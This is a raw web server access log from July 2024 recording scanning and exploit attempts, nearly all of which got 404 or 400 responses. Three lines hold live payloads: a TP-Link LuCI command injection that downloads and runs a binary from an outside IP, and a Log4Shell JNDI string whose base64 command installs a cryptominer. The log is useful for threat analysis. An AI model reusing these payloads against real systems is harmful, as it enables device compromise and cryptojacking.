174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
104.168.70.165 - - [05/Jul/2024:20:28:43 +0200] "GET / HTTP/1.1" 200 1895
174.138.2.203 - - [05/Jul/2024:20:35:34 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:36 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:36 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:37 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:38 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:39 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:35:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
87.121.69.27 - - [05/Jul/2024:21:04:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
172.105.128.13 - - [05/Jul/2024:21:34:55 +0200] "-" 400 1930
185.191.126.213 - - [05/Jul/2024:21:43:15 +0200] "GET / HTTP/1.1" 200 1895
187.202.148.32 - - [05/Jul/2024:21:51:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
45.148.10.174 - - [05/Jul/2024:22:04:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:22:04:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
45.33.109.8 - - [05/Jul/2024:22:04:27 +0200] "GET / HTTP/1.1" 200 1895
192.155.90.118 - - [05/Jul/2024:22:04:49 +0200] "GET / HTTP/1.1" 200 1895
147.185.132.240 - - [05/Jul/2024:22:06:33 +0200] "GET / HTTP/1.0" 200 1895
41.233.159.231 - - [05/Jul/2024:22:10:02 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
87.121.69.27 - - [05/Jul/2024:22:20:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
95.214.55.144 - - [05/Jul/2024:22:27:20 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//95.214.55.202:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1213
23.94.0.83 - - [05/Jul/2024:23:19:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
206.168.32.107 - - [05/Jul/2024:23:37:59 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.107 - - [05/Jul/2024:23:38:02 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.107 - - [05/Jul/2024:23:38:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729